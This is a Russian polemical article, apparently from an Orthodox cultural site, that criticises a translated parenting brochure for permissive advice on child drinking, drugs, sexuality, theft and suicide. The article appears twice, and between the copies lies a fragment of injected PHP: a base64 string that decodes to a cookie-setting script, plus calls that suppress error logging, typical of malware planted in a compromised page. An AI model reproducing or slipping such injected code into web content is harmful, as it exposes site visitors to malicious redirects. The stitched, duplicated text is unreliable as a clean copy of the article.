Опасности "новой педагогики"

Чтобы родители не пропахли нафталином (педагогика "нью эйдж")

"Ребенок попал в беду..." - таков тревожно-притягательный заголовок брошюры, выпущенной объединением педагогических изданий. Там же, на обложке, точно указан и адресат: "Справочник для учителей и родителей". Брошюра переводная, хоть и тощая, но очень ценная. Квинтэссенция не только "новой педагогики", но и "нового мышления". С плодами подобного "просвещения" мы, увы, не раз сталкивались в нашей психокоррекционной работе с детьми. Беседуешь иногда с мамой и чувствуешь, что она буквально "нашпигована" новыми воспитательными установками. "Я принимаю своего сына таким, какой он есть, и что бы он ни делал, он знает: я, мать, всегда на его стороне...", "Как это запретить дочери читать этот журнал? Да какое я право имею диктовать ей? В двенадцать-то лет!..", "Запретами все равно ничего не добьешься, только хуже будет..." Звучит гуманно и уж точно по-новому. А кому хочется прослыть несовременным, пропахшим нафталином? Но давайте посмотрим, куда приведет нас (а значит, и наших детей) это "новое".

 

Родители ребенку не пример ГЛАВА - "Самое верное средство от детского пьянства" - ошарашивает уже своим началом. "Взрослым вообще-то нечем поделиться со своим ребенком, и они не должны особенно настаивать на том, чтобы дети брали с них пример, потому что такового они как раз и не подают". Одной корявой (судя по всему, неумело переведенной) фразой сокрушается основа основ воспитания. Во все времена все народы, независимо от верований, культур и национальной принадлежности, учили детей брать пример с родителей. Да иначе и быть не может!

 

Отец и мать для ребенка - это первые люди, которых он видит. Их интонации, выражение лиц, манера поведения и т. п. прочно запечатлеваются в его душе и служат образцом. Более того, именно дети всегда способствовали стремлению родителей к совершенству: отец и мать старались в их глазах выглядеть умнее, добрее, благороднее, чем они есть на самом деле. И вот то, что еще вчера подвергалось суровому осуждению, сегодня чуть ли не вменяется в обязанность! Опасно здесь еще и другое. Ориентация родителей на "беспримерность" провоцирует социальное сиротство. Ребенок, лишенный идеала в семье, начинает искать его на стороне. А в сегодняшней жизни вместо идеала ему скорее встретится антиидеал: наркоторговец, ласковый педофил, глава тоталитарной или сатанинской секты или просто "крутой" сверстник.

 

Так как же нам советуют реагировать на детское пьянство? "...Поддаваться порывам. Да, порыву любви и порыву гнева. Как же так, скажете вы, кричать в гневе? Ругаться, драться? Но разве в порыве любви мы не хватаем ребенка и не целуем его? Сердечный порыв, если дать ему настоящую волю, человечен по существу и форме. Он благороден". Но только родитель, усвоив новое правило, настроился в порыве благородного негодования вложить ума своему пьяному недорослю, как его спешат осадить новым советом: "Не набрасывайтесь на него с нотациями; вы уже опоздали, а после драки кулаками не машут. Даже если он чуть навеселе, его реакция может быть неадекватной".

 

Как говорили в старину, есть здесь некие противоречия... Не волнуйтесь, в вашей семье наркоман ЯСНО, что далеко не все папы и мамы придут в восторг от подобных педагогических инноваций, поэтому, стараясь смягчить впечатление, авторы добавляют: "Зато никто не запрещает вам обговорить допустимые нормы поведения и правила общежития". Стоп! Вот мы и добрались до самого главного. Эту матрицу сейчас внедряют повсеместно. Смысл ее сводится к следующему: давайте легализуем пороки, но попробуем установить для них некоторые ограничения. Легализуем порнографию, но ларьки, в которых она будет продаваться, удалим от детских учреждений на расстояние не менее 300 м. Легализуем наркоманию, но будем призывать наркоманов пользоваться одноразовыми шприцами. Одобрим подростковый разврат, но расскажем об опасности венерических заболеваний и раздадим презервативы. Другими словами, будем требовать от беззакония законопослушности.

 

Так хотите узнать, как правильно себя вести, если вы подозреваете, что ваш ребенок употребляет наркотики? Надо "не демонстрировать чрезмерного волнения, установленные необычные факты обсудить с ребенком, не читать мораль и ни в коем случае не угрожать, не наказывать...". "Если он все отрицает - расскажите о своих подозрениях, если спорит - опровергайте, но не берите с него слово, не заставляйте подчиняться. Лучше спросите, что он сам думает делать дальше, и предупредите, что отныне вы будете строже следить за тем, как и на что он тратит деньги. Но главное, "самое время дать ему понять, что вы на его стороне, что не осуждаете..." Короче, предлагается на юного наркомана не давить, ничего ему не запрещать и даже продолжать выдачу денег! Да, очень нетрадиционная педагогика... Испокон веку нормальные родители реагировали на опасное поведение детей немедленной изоляцией их от источника зла, от пагубной обстановки. Вспомните хотя бы Наташу Ростову, которую отец запер, чтобы она не сбежала с Анатолем. Конечно, придется понервничать, проявить твердость, выдержать детские истерики и грубость, побыть в глазах своего ребенка злодеем, но зато уберечь его от беды. Ведь и мы, став взрослыми, столько раз мысленно благодарили родителей за ту самую строгость, которую в сердцах проклинали в подростковом возрасте. Насильников искушают дети В ДУХЕ попустительства предложено относиться и к детскому разврату. "Старшее поколение не может и не должно контролировать подростковую сексуальность". Оказывается, "признавая, что ранняя сексуальная жизнь подростков и столь же ранние эксперименты с наркотиками не экстремальные, а скорее обыденные искушения нового поколения, невозможно ни запретить, ни контролировать эти опыты". Как заставить людей смириться с вопиющим безобразием, с которым ни один нормальный человек смириться не может? Способов немного. А точнее, всего два. Можно принудить силой, а можно, соблюдая "права человека", добиться желаемого изощренным способом: убедить, что безобразие, во-первых, не такое уж и вопиющее; во-вторых, оно распространено повсеместно, а в-третьих - что, пожалуй, главное! - все равно оно неустранимо. В нашей брошюре практически все подчинено данной логике. Но особенно ярко она проявлена в "мифах о сексуальном насилии".

 

Споря с общепринятым мнением о педофилах как об извращенцах, авторы утверждают, что "большинство педофилов - самые обычные мужчины, с нормальной психикой". Развенчивается и "миф" о том, что "сексуальные покушения на детей редки и являются признаком морального распада и деградации общества". На самом деле, утверждают авторы, все это было всегда и "статистически часто". В общем, вполне банальная история. И насчет ребенка не следует заблуждаться. "Шестой миф: ребенок - пассивный объект сексуальных посягательств. Приходится признать: он может быть инициатором". Словом, нас хотят уверить, что нет четкой границы между жертвой и преступником, добром и злом. Все относительно, зыбко, "неоднозначно". Ну и, конечно, зло непобедимо. "Даже самая идеальная система права не в состоянии полностью защитить ребенка от насилия. Здесь важен не столько контроль, сколько просвещение. Родители и учителя должны знать, что сексуальная эксплуатация детей - большая и серьезная проблема". Так и написано - "проблема". Есть проблема утомляемости на уроках, есть проблема аллергии, а есть... сексуального насилия над детьми. Хочется, заняв прилагательное у авторов, сказать, что это "большая и серьезная" победа зла, если растление ребенка, надругательство над его невинностью становится для нас не чудовищным преступлением, не трагедией и даже не драмой, а проблемой. И решая ее, главное (как, впрочем, и во всех остальных случаях, перечисленных в брошюре), "сохранять спокойствие". К воришке надо относиться бережно А РЕКОМЕНДАЦИИ взрослым по поводу детского воровства - это прямо какая-то оргия гуманизма. "Хорошенько подумайте прежде, чем приступать к решительным действиям. Наверное, наказывать надо, но только если вы уверены, что и ребенок считает это наказание справедливым... Пережив наказание, ребенок, скорее всего, научится ловчить, скрытничать, боясь лишь одного - быть разоблаченным... Пожалейте его, и ему сразу станет стыдно. (А если нет? Если он сочтет таких родственников придурками, из которых можно вить веревки? Тогда как? - Авт.) Помогите исправить то, что он совершил. КАК МОЖНО БЕРЕЖНЕЙ ОТНЕСИТЕСЬ И К НЕМУ, И К ЕГО ПОСТУПКУ (выделено нами. - Авт.).

 

Не ужас наказания, а страх повторения - вот что отныне должно поселиться в его душе". Должно, конечно, но может поселиться - и скорее всего поселится! - совсем другое: чувство полной безнаказанности и желание новых "подвигов". Поддавшись умилению, читатель, быть может, проглядел одну характерную подмену: кража, совершенная ребенком, названа поступком (даже не проступком!). А ведь это преступление, хоть по малолетству, как правило, неподсудное. Более того, своровать - значит нарушить одну из десяти заповедей, т. е. самых строгих запретов для людей христианской культуры. Впрочем, ни в каких культурах воровство, мягко говоря, не поощряется. Апологеты же "гуманной педагогики" советуют отнестись к воровству "как можно бережней". Даже в столь вопиющем случае идея наказания им явно претит. Самоубийстово неэстетично ВПРОЧЕМ, есть одна тема, рассматривая которую авторы советуют применить жесткость. Это тема самоубийства. В одной из двух глав, посвященных детским суицидам, есть такой подзаголовок: "Пожалуйста, прочтите эту страничку вашему ребенку". А на страничке есть, например, такой пассаж: "Вы когда-нибудь видели свежий труп? Глаза навыкате, вывалившийся синий язык, лицо неопределенного цвета да к тому же пренеприятнейший запах от самопроизвольного акта дефекации". Авторы считают, что такая стресс-педагогика "неприятна, зато действенна". Дескать, запугаем хорошенько посмертным уродством, авось не захочет сводить счеты с жизнью.

 

Значит, они все-таки понимают, что страх - это один из самых действенных способов, когда хочешь удержать подростка от гибельного шага. И весь их либерализм по отношению к детскому пьянству, наркомании, разврату, "дурным болезням", воровству и прочим "поступкам" объясняется тем, что они просто не видят в этом такой уж серьезной угрозы. Вообще такое впечатление, что сверхзадача "Справочника для учителей и родителей" - запрограммировать взрослых на равнодушие к детям. Напился ребенок - не волнуйтесь. Балуется наркотиками - не впадайте в панику. Ушел из дома - заранее, на случай опознания трупа, "положите в разные карманы записки, где указаны Ф.И.О., адрес и номер телефона, по которому нужно позвонить...". Хотели на этом оборвать цитату, но не удержались и приводим еще несколько фраз: "Не стесняйтесь заранее снять копию зубной карты из стоматологического кабинета и сделать датокарту: нанесите на пальцы (ребенка) тонким слоем типографскую краску и откатайте отпечатки на бумаге, а под ними надпишите "левая", "правая" рука. Если случится трагедия, это поможет идентификации". Не будем обращать особенно много внимания на то, НАДписать что- либо ПОД отпечатком или картинкой нельзя. А вот с какой стати такой подросток будет терпеть в своих карманах дурацкие мамины записки или покорно подставлять руку для дактилоскопии, предназначенной для опознания его трупа? И где авторы видели такие стоматологические кабинеты, где услужливый дантист по первому требованию снимает копию зубной карты? Публикуете пиратский перевод - так хотя бы изымите то, что к нашей жизни не имеет ровно никакого отношения.

 

Не позорьтесь! Расслабьтесь, в колонию попали не вы... НАДЕЕМСЯ, что большинство читателей понимают, что потакание детским порокам рано или поздно доведет ребенка до той опасной черты, за которой его ждут либо гибель, либо тюрьма. На самом деле это понимают даже авторы брошюры, хотя усиленно делают вид, что нет никакой связи между родительским попустительством и катастрофой, постигающей ребенка. Во всяком случае, о колонии они напоследок упоминают. Подглавка "Что делать, если ваш ребенок попал в колонию" начинается со слов: "Что сделано, то сделано, назад не вернешь, и надо жить дальше. Оставьте обиды, ссоры, раздумья на тему "За что мне все это?" Во- первых, не вам, во-вторых, что в них толку?" Иначе говоря, родителей сперва настраивают на потакание детскому безобразию, а потом, когда "вырастет из сына свин" и ситуация дойдет до критической точки, - на равнодушие. Даже когда ребенок попадает в колонию, оказывается, не надо задаваться вопросом, за что вам это, когда и в чем вы его упустили. Спокойствие, только спокойствие, ведь "не вам", а всего-то на всего вашему сыну идти за колючую проволоку. Так что нет оснований для паники. Как любил повторять все тот же Карлсон, дело житейское. Уж если в главе, посвященной самоубийствам, авторы советуют отвести подростка, замышляющего лишить себя жизни, в сторонку и "мирно поговорить". "Если же, - цитируем, - этот вариант не срабатывает, то - сам виноват". Раз даже по такому поводу волноваться не стоит, то чего махать крыльями, когда руки-ноги целы, да еще - в наше-то трудное время - парень будет на гособеспечении! Апофеоз родительского служения - это открыть на нужной странице справочник, найти телефон нужного специалиста и передоверить ему ребенка, как это принято во всем цивилизованном мире.

 

Поэтому в таком контексте фразы типа: "Терпение и смирение - может, спасение в них?" -звучат по меньшей мере странно. Смирение перед чем - перед грехом? Хотя вряд ли авторы брошюры ведали, что творили. Скорее всего, они просто отрабатывали выгодный заказ, по- детски радуясь, что можно подзаработать без особого напряжения. Ладно, оставим это на их совести. Тем же, кто понимает, нельзя свалить свою вину ни на специалистов, ни на горе-педагогов, пишущих как будто под копирку безответственные книги и брошюры, ни на государство, поддерживающее либеральную педагогику, нужно почаще вспоминать если не о премудрости, то хотя бы о здравом смысле.

 

 

Ирина МЕДВЕДЕВА, Татьяна ШИШОВА

Раздел: 
aG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?> Опасности "новой педагогики" | Центр православной культуры Лествица

Опасности "новой педагогики"

Чтобы родители не пропахли нафталином (педагогика "нью эйдж")

"Ребенок попал в беду..." - таков тревожно-притягательный заголовок брошюры, выпущенной объединением педагогических изданий. Там же, на обложке, точно указан и адресат: "Справочник для учителей и родителей". Брошюра переводная, хоть и тощая, но очень ценная. Квинтэссенция не только "новой педагогики", но и "нового мышления". С плодами подобного "просвещения" мы, увы, не раз сталкивались в нашей психокоррекционной работе с детьми. Беседуешь иногда с мамой и чувствуешь, что она буквально "нашпигована" новыми воспитательными установками. "Я принимаю своего сына таким, какой он есть, и что бы он ни делал, он знает: я, мать, всегда на его стороне...", "Как это запретить дочери читать этот журнал? Да какое я право имею диктовать ей? В двенадцать-то лет!..", "Запретами все равно ничего не добьешься, только хуже будет..." Звучит гуманно и уж точно по-новому. А кому хочется прослыть несовременным, пропахшим нафталином? Но давайте посмотрим, куда приведет нас (а значит, и наших детей) это "новое".

 

Родители ребенку не пример ГЛАВА - "Самое верное средство от детского пьянства" - ошарашивает уже своим началом. "Взрослым вообще-то нечем поделиться со своим ребенком, и они не должны особенно настаивать на том, чтобы дети брали с них пример, потому что такового они как раз и не подают". Одной корявой (судя по всему, неумело переведенной) фразой сокрушается основа основ воспитания. Во все времена все народы, независимо от верований, культур и национальной принадлежности, учили детей брать пример с родителей. Да иначе и быть не может!

 

Отец и мать для ребенка - это первые люди, которых он видит. Их интонации, выражение лиц, манера поведения и т. п. прочно запечатлеваются в его душе и служат образцом. Более того, именно дети всегда способствовали стремлению родителей к совершенству: отец и мать старались в их глазах выглядеть умнее, добрее, благороднее, чем они есть на самом деле. И вот то, что еще вчера подвергалось суровому осуждению, сегодня чуть ли не вменяется в обязанность! Опасно здесь еще и другое. Ориентация родителей на "беспримерность" провоцирует социальное сиротство. Ребенок, лишенный идеала в семье, начинает искать его на стороне. А в сегодняшней жизни вместо идеала ему скорее встретится антиидеал: наркоторговец, ласковый педофил, глава тоталитарной или сатанинской секты или просто "крутой" сверстник.

 

Так как же нам советуют реагировать на детское пьянство? "...Поддаваться порывам. Да, порыву любви и порыву гнева. Как же так, скажете вы, кричать в гневе? Ругаться, драться? Но разве в порыве любви мы не хватаем ребенка и не целуем его? Сердечный порыв, если дать ему настоящую волю, человечен по существу и форме. Он благороден". Но только родитель, усвоив новое правило, настроился в порыве благородного негодования вложить ума своему пьяному недорослю, как его спешат осадить новым советом: "Не набрасывайтесь на него с нотациями; вы уже опоздали, а после драки кулаками не машут. Даже если он чуть навеселе, его реакция может быть неадекватной".

 

Как говорили в старину, есть здесь некие противоречия... Не волнуйтесь, в вашей семье наркоман ЯСНО, что далеко не все папы и мамы придут в восторг от подобных педагогических инноваций, поэтому, стараясь смягчить впечатление, авторы добавляют: "Зато никто не запрещает вам обговорить допустимые нормы поведения и правила общежития". Стоп! Вот мы и добрались до самого главного. Эту матрицу сейчас внедряют повсеместно. Смысл ее сводится к следующему: давайте легализуем пороки, но попробуем установить для них некоторые ограничения. Легализуем порнографию, но ларьки, в которых она будет продаваться, удалим от детских учреждений на расстояние не менее 300 м. Легализуем наркоманию, но будем призывать наркоманов пользоваться одноразовыми шприцами. Одобрим подростковый разврат, но расскажем об опасности венерических заболеваний и раздадим презервативы. Другими словами, будем требовать от беззакония законопослушности.

 

Так хотите узнать, как правильно себя вести, если вы подозреваете, что ваш ребенок употребляет наркотики? Надо "не демонстрировать чрезмерного волнения, установленные необычные факты обсудить с ребенком, не читать мораль и ни в коем случае не угрожать, не наказывать...". "Если он все отрицает - расскажите о своих подозрениях, если спорит - опровергайте, но не берите с него слово, не заставляйте подчиняться. Лучше спросите, что он сам думает делать дальше, и предупредите, что отныне вы будете строже следить за тем, как и на что он тратит деньги. Но главное, "самое время дать ему понять, что вы на его стороне, что не осуждаете..." Короче, предлагается на юного наркомана не давить, ничего ему не запрещать и даже продолжать выдачу денег! Да, очень нетрадиционная педагогика... Испокон веку нормальные родители реагировали на опасное поведение детей немедленной изоляцией их от источника зла, от пагубной обстановки. Вспомните хотя бы Наташу Ростову, которую отец запер, чтобы она не сбежала с Анатолем. Конечно, придется понервничать, проявить твердость, выдержать детские истерики и грубость, побыть в глазах своего ребенка злодеем, но зато уберечь его от беды. Ведь и мы, став взрослыми, столько раз мысленно благодарили родителей за ту самую строгость, которую в сердцах проклинали в подростковом возрасте. Насильников искушают дети В ДУХЕ попустительства предложено относиться и к детскому разврату. "Старшее поколение не может и не должно контролировать подростковую сексуальность". Оказывается, "признавая, что ранняя сексуальная жизнь подростков и столь же ранние эксперименты с наркотиками не экстремальные, а скорее обыденные искушения нового поколения, невозможно ни запретить, ни контролировать эти опыты". Как заставить людей смириться с вопиющим безобразием, с которым ни один нормальный человек смириться не может? Способов немного. А точнее, всего два. Можно принудить силой, а можно, соблюдая "права человека", добиться желаемого изощренным способом: убедить, что безобразие, во-первых, не такое уж и вопиющее; во-вторых, оно распространено повсеместно, а в-третьих - что, пожалуй, главное! - все равно оно неустранимо. В нашей брошюре практически все подчинено данной логике. Но особенно ярко она проявлена в "мифах о сексуальном насилии".

 

Споря с общепринятым мнением о педофилах как об извращенцах, авторы утверждают, что "большинство педофилов - самые обычные мужчины, с нормальной психикой". Развенчивается и "миф" о том, что "сексуальные покушения на детей редки и являются признаком морального распада и деградации общества". На самом деле, утверждают авторы, все это было всегда и "статистически часто". В общем, вполне банальная история. И насчет ребенка не следует заблуждаться. "Шестой миф: ребенок - пассивный объект сексуальных посягательств. Приходится признать: он может быть инициатором". Словом, нас хотят уверить, что нет четкой границы между жертвой и преступником, добром и злом. Все относительно, зыбко, "неоднозначно". Ну и, конечно, зло непобедимо. "Даже самая идеальная система права не в состоянии полностью защитить ребенка от насилия. Здесь важен не столько контроль, сколько просвещение. Родители и учителя должны знать, что сексуальная эксплуатация детей - большая и серьезная проблема". Так и написано - "проблема". Есть проблема утомляемости на уроках, есть проблема аллергии, а есть... сексуального насилия над детьми. Хочется, заняв прилагательное у авторов, сказать, что это "большая и серьезная" победа зла, если растление ребенка, надругательство над его невинностью становится для нас не чудовищным преступлением, не трагедией и даже не драмой, а проблемой. И решая ее, главное (как, впрочем, и во всех остальных случаях, перечисленных в брошюре), "сохранять спокойствие". К воришке надо относиться бережно А РЕКОМЕНДАЦИИ взрослым по поводу детского воровства - это прямо какая-то оргия гуманизма. "Хорошенько подумайте прежде, чем приступать к решительным действиям. Наверное, наказывать надо, но только если вы уверены, что и ребенок считает это наказание справедливым... Пережив наказание, ребенок, скорее всего, научится ловчить, скрытничать, боясь лишь одного - быть разоблаченным... Пожалейте его, и ему сразу станет стыдно. (А если нет? Если он сочтет таких родственников придурками, из которых можно вить веревки? Тогда как? - Авт.) Помогите исправить то, что он совершил. КАК МОЖНО БЕРЕЖНЕЙ ОТНЕСИТЕСЬ И К НЕМУ, И К ЕГО ПОСТУПКУ (выделено нами. - Авт.).

 

Не ужас наказания, а страх повторения - вот что отныне должно поселиться в его душе". Должно, конечно, но может поселиться - и скорее всего поселится! - совсем другое: чувство полной безнаказанности и желание новых "подвигов". Поддавшись умилению, читатель, быть может, проглядел одну характерную подмену: кража, совершенная ребенком, названа поступком (даже не проступком!). А ведь это преступление, хоть по малолетству, как правило, неподсудное. Более того, своровать - значит нарушить одну из десяти заповедей, т. е. самых строгих запретов для людей христианской культуры. Впрочем, ни в каких культурах воровство, мягко говоря, не поощряется. Апологеты же "гуманной педагогики" советуют отнестись к воровству "как можно бережней". Даже в столь вопиющем случае идея наказания им явно претит. Самоубийстово неэстетично ВПРОЧЕМ, есть одна тема, рассматривая которую авторы советуют применить жесткость. Это тема самоубийства. В одной из двух глав, посвященных детским суицидам, есть такой подзаголовок: "Пожалуйста, прочтите эту страничку вашему ребенку". А на страничке есть, например, такой пассаж: "Вы когда-нибудь видели свежий труп? Глаза навыкате, вывалившийся синий язык, лицо неопределенного цвета да к тому же пренеприятнейший запах от самопроизвольного акта дефекации". Авторы считают, что такая стресс-педагогика "неприятна, зато действенна". Дескать, запугаем хорошенько посмертным уродством, авось не захочет сводить счеты с жизнью.

 

Значит, они все-таки понимают, что страх - это один из самых действенных способов, когда хочешь удержать подростка от гибельного шага. И весь их либерализм по отношению к детскому пьянству, наркомании, разврату, "дурным болезням", воровству и прочим "поступкам" объясняется тем, что они просто не видят в этом такой уж серьезной угрозы. Вообще такое впечатление, что сверхзадача "Справочника для учителей и родителей" - запрограммировать взрослых на равнодушие к детям. Напился ребенок - не волнуйтесь. Балуется наркотиками - не впадайте в панику. Ушел из дома - заранее, на случай опознания трупа, "положите в разные карманы записки, где указаны Ф.И.О., адрес и номер телефона, по которому нужно позвонить...". Хотели на этом оборвать цитату, но не удержались и приводим еще несколько фраз: "Не стесняйтесь заранее снять копию зубной карты из стоматологического кабинета и сделать датокарту: нанесите на пальцы (ребенка) тонким слоем типографскую краску и откатайте отпечатки на бумаге, а под ними надпишите "левая", "правая" рука. Если случится трагедия, это поможет идентификации". Не будем обращать особенно много внимания на то, НАДписать что- либо ПОД отпечатком или картинкой нельзя. А вот с какой стати такой подросток будет терпеть в своих карманах дурацкие мамины записки или покорно подставлять руку для дактилоскопии, предназначенной для опознания его трупа? И где авторы видели такие стоматологические кабинеты, где услужливый дантист по первому требованию снимает копию зубной карты? Публикуете пиратский перевод - так хотя бы изымите то, что к нашей жизни не имеет ровно никакого отношения.

 

Не позорьтесь! Расслабьтесь, в колонию попали не вы... НАДЕЕМСЯ, что большинство читателей понимают, что потакание детским порокам рано или поздно доведет ребенка до той опасной черты, за которой его ждут либо гибель, либо тюрьма. На самом деле это понимают даже авторы брошюры, хотя усиленно делают вид, что нет никакой связи между родительским попустительством и катастрофой, постигающей ребенка. Во всяком случае, о колонии они напоследок упоминают. Подглавка "Что делать, если ваш ребенок попал в колонию" начинается со слов: "Что сделано, то сделано, назад не вернешь, и надо жить дальше. Оставьте обиды, ссоры, раздумья на тему "За что мне все это?" Во- первых, не вам, во-вторых, что в них толку?" Иначе говоря, родителей сперва настраивают на потакание детскому безобразию, а потом, когда "вырастет из сына свин" и ситуация дойдет до критической точки, - на равнодушие. Даже когда ребенок попадает в колонию, оказывается, не надо задаваться вопросом, за что вам это, когда и в чем вы его упустили. Спокойствие, только спокойствие, ведь "не вам", а всего-то на всего вашему сыну идти за колючую проволоку. Так что нет оснований для паники. Как любил повторять все тот же Карлсон, дело житейское. Уж если в главе, посвященной самоубийствам, авторы советуют отвести подростка, замышляющего лишить себя жизни, в сторонку и "мирно поговорить". "Если же, - цитируем, - этот вариант не срабатывает, то - сам виноват". Раз даже по такому поводу волноваться не стоит, то чего махать крыльями, когда руки-ноги целы, да еще - в наше-то трудное время - парень будет на гособеспечении! Апофеоз родительского служения - это открыть на нужной странице справочник, найти телефон нужного специалиста и передоверить ему ребенка, как это принято во всем цивилизованном мире.

 

Поэтому в таком контексте фразы типа: "Терпение и смирение - может, спасение в них?" -звучат по меньшей мере странно. Смирение перед чем - перед грехом? Хотя вряд ли авторы брошюры ведали, что творили. Скорее всего, они просто отрабатывали выгодный заказ, по- детски радуясь, что можно подзаработать без особого напряжения. Ладно, оставим это на их совести. Тем же, кто понимает, нельзя свалить свою вину ни на специалистов, ни на горе-педагогов, пишущих как будто под копирку безответственные книги и брошюры, ни на государство, поддерживающее либеральную педагогику, нужно почаще вспоминать если не о премудрости, то хотя бы о здравом смысле.

 

 

Ирина МЕДВЕДЕВА, Татьяна ШИШОВА

Раздел: